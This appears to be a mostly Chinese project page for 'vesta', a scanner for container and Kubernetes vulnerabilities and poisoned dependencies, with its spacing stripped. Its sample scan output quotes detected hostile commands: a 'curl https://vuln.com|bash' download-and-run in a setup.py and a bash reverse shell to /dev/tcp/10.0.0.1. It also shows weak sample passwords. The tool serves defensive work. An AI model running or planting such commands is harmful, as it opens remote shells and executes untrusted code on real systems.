Scan
扫描通过主流安装方法安装程序的漏洞apt/apt-getrpmyumdpkg扫描软件依赖的漏洞以及恶意投毒的依赖包Java(Jar,War,以及主流依赖log4j)NodeJs(NPM,YARN)Python(Wheel,Poetry)Golang(Gobinary)PHP(Composer,以及主流的PHP框架:laravel,thinkphp,wordpress,wordpress插件等)Rust(Rustbinary)Docker检查
SupportedCheckItemDescriptionSeverityReference✔PrivilegeAllowed危险的特权模式criticalRef✔Capabilities危险capabilities被设置criticalRef✔VolumeMount敏感或危险目录被挂载criticalRef✔DockerUnauthorized2375端口打开并且未授权criticalRef✔Kernelversion当前内核版本存在逃逸漏洞criticalRef✔NetworkModuleNet模式为host模式或同时在特定containerd版本下critical/medium ✔PidModulePid模式被设置为hosthigh ✔DockerServerversionDockerServer版本存在漏洞critical/high/medium/low ✔DockerenvpasswordcheckDockerenv是否存在弱密码high/medium ✔ImagetagcheckImage没有被打tag或为默认latestlow ✔DockerhistoryDockerlayers存在不安全的命令high/medium ✔DockerBackdoorDockerenvcommand存在恶意命令critical/highKubernetes检查
SupportedCheckItemDescriptionSeverityReference✔PrivilegeAllowed危险的特权模式criticalRef✔Capabilities危险capabilities被设置criticalRef✔PVandPVCPV被挂载到敏感目录并且状态为activecritical/mediumRef✔RBACK8s权限存在危险配置high/medium/low/warning ✔Kubernetes-dashborad检查 -enable-skip-login以及dashborad的账户权限critical/high/lowRef✔Kernelversion当前内核版本存在逃逸漏洞criticalRef✔DockerServerversion(k8sversionsislessthanv1.24)DockerServer版本存在漏洞critical/high/medium/low ✔Kubernetescertificationexpiration证书到期时间小于30天medium ✔ConfigMapandSecretcheckConfigMap或者Secret是否存在弱密码high/medium ✔PodSecurityPolicycheck(k8sversionunderthev1.25)PodSecurityPolicy过度容忍Pod不安全配置high/medium/lowRef✔AutoMountServiceAccountTokenPod默认挂载了servicetokencritical/high/medium/lowRef✔NoResourceLimits没有限制资源的使用,例如CPU,Memory,存储lowRef✔JobandCronjobJob或CronJob没有设置seccomp或seLinux安全策略lowRef✔EnvoyadminEnvoyadmin被配置以及监听0.0.0.0.high/mediumRef✔CiliumversionCilium存在漏洞版本critical/high/medium/lowRef✔IstioconfigurationsIstio存在漏洞版本以及安全配置检查critical/high/medium/lowRef✔Kubelet10255andKubectlproxy10255port打开或Kubectlproxy开启high/medium/low ✔EtcdconfigurationEtcd安全配置检查high/medium ✔SidecarconfigurationsSidecar安全配置检查以及Env环境检查critical/high/medium/low ✔PodannotationPodannotation存在不安全配置high/medium/low/warningRef✔DaemonSetDaemonSet存在不安全配置critical/high/medium/low ✔Backdoor检查k8s中是否有后门critical/highRef✔LateraladminmovementPod被特意配置到Master节点中medium/low 编译并使用vesta编译vesta使用makebuild 进行编译从Releases上下载可执行文件使用vesta检查镜像过容器中的漏洞组件版本(使用镜像ID,镜像标签或使用-f文件输入均可)$./vestascancontainer-fexample.tar2022/11/2922:50:19Beginupgradingvulnerabilitydatabase2022/11/2922:50:19VulnerabilityDatabaseisalreadyinitialized2022/11/2922:50:19Begintoanalyzethelayer2022/11/2922:50:35BegintoscanthelayerDetected216vulnerabilities+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+|208|python3.6-Django|2.2.3|CVE-2019-14232|7.5|high|Anissuewasdiscovered||||||||inDjango1.11.xbefore||||||||1.11.23,2.1.xbefore2.1.11,||||||||and2.2.xbefore2.2.4.If||||||||django.utils.text.Truncator's||||||||chars()andwords()methods||||||||werepassedthehtml=True||||||||argument,t...|+-----++-----------------+------------------+-------+----------+------------------------------------------------------------------+|209||2.2.3|CVE-2019-14233|7.5|high|Anissuewasdiscovered||||||||inDjango1.11.xbefore||||||||1.11.23,2.1.xbefore2.1.11,||||||||and2.2.xbefore2.2.4.||||||||Duetothebehaviourof||||||||theunderlyingHTMLParser,||||||||django.utils.html.strip_tags||||||||wouldbeextremely...|+-----++-----------------+------------------+-------+----------+------------------------------------------------------------------+|210||2.2.3|CVE-2019-14234|9.8|critical|Anissuewasdiscoveredin||||||||Django1.11.xbefore1.11.23,||||||||2.1.xbefore2.1.11,and2.2.x||||||||before2.2.4.Duetoanerror||||||||inshallowkeytransformation,||||||||keyandindexlookupsfor||||||||django.contrib.postgres.f...|+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+|211|python3.6-numpy|1.24.2||8.5|high|Maliciouspackageisdetectedin||||||||'/usr/local/lib/python3.6/site-packages/numpy/setup.py',||||||||maliciouscommand"curlhttps://vuln.com|bash"are||||||||detected.|+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+ 使用vesta检查Docker的基线配置也可以在docker中使用makerun.docker $./vestaanalyzedocker2022/11/2923:06:32StartanalysingDetected3vulnerabilities+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+|ID|CONTAINERDETAIL|PARAM|VALUE|SEVERITY|DESCRIPTION|+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+|1|Name:Kernel|kernelversion|5.10.104-linuxkit|critical|Kernelversionissuffering|||ID:None||||theCVE-2022-0492with|||||||CAP_SYS_ADMINandv1|||||||architectureofcgroups|||||||vulnerablility,hasa|||||||potentialcontainerescape.|+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+|2|Name:vesta_vuln_test|kernelversion|5.10.104-linuxkit|critical|Kernelversionissuffering|||ID:207cf8842b15||||theDirtyPipevulnerablility,|||||||hasapotentialcontainer|||||||escape.|+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+|3|Name:ImageTag|Privileged|true|critical|Therehasapotentialcontainer|||ID:None||||escapeinprivilegedmodule.||||||||+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+|4|Name:ImageConfiguration|ImageHistory|Imagename:|high|Weakpasswordfound|||ID:None||vesta_history_test:latest|||incommand:'echo|||||ImageID:4bc05e1e3881||'password=test123456'>|||||||config.ini#buildkit'.|+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+ 使用vesta检查Kubernetes的基线配置2022/11/2923:15:59Startanalysing2022/11/2923:15:59Getingdockerserverversion2022/11/2923:15:59GetingkernelversionDetected4vulnerabilitiesPods:+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+|ID|PODDETAIL|PARAM|VALUE|TYPE|SEVERITY|DESCRIPTION|+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+|1|Name:vulntest|Namespace:|sidecarname:vulntest||true|Pod|critical|Therehasapotential|||default|Status:Running||Privileged||||containerescapeinprivileged|||NodeName:docker-desktop|||||module.|+++--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+|||sidecarname:vulntest||Token:Password123456|SidecarEnvFrom|high|SidecarenvFromConfigMaphas||||env||||foundweakpassword:||||||||'Password123456'.|+++--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+|||sidecarname:sidecartest||MALWARE:bash-i>&|SidecarEnv|high|Container'sidecartest'finds||||env|/dev/tcp/10.0.0.1/80800>&1|||highriskcontent(score:||||||||0.91outof1.0),whichisa||||||||suspectcommandbackdoor.|+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+|2|Name:vulntest2|Namespace:|sidecarname:vulntest2||CAP_SYS_ADMIN|capabilities.add|critical|Therehasapotential|||default|Status:Running||capabilities||||containerescapeinprivileged|||NodeName:docker-desktop|||||module.|+++--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+|||sidecarname:vulntest2||true|kube-api-access-lcvh8|critical|Mountserviceaccount||||automountServiceAccountToken||||andkeypermissionare||||||||given,whichwillcausea||||||||potentialcontainerescape.||||||||ReferenceclsuterRolebind:||||||||vuln-clusterrolebinding|||||||||roleBinding:vuln-rolebinding|+++--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+|||sidecarname:vulntest2||cpu|Pod|low|CPUusageisnotlimited.||||Resource|||||||||||||+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+Configures:+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+|ID|TYPEL|PARAM|VALUE|SEVERITY|DESCRIPTION|+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+|1|K8sversionlessthanv1.24|kernelversion|5.10.104-linuxkit|critical|Kernelversionissuffering|||||||theCVE-2022-0185with|||||||CAP_SYS_ADMINvulnerablility,|||||||hasapotentialcontainer|||||
评论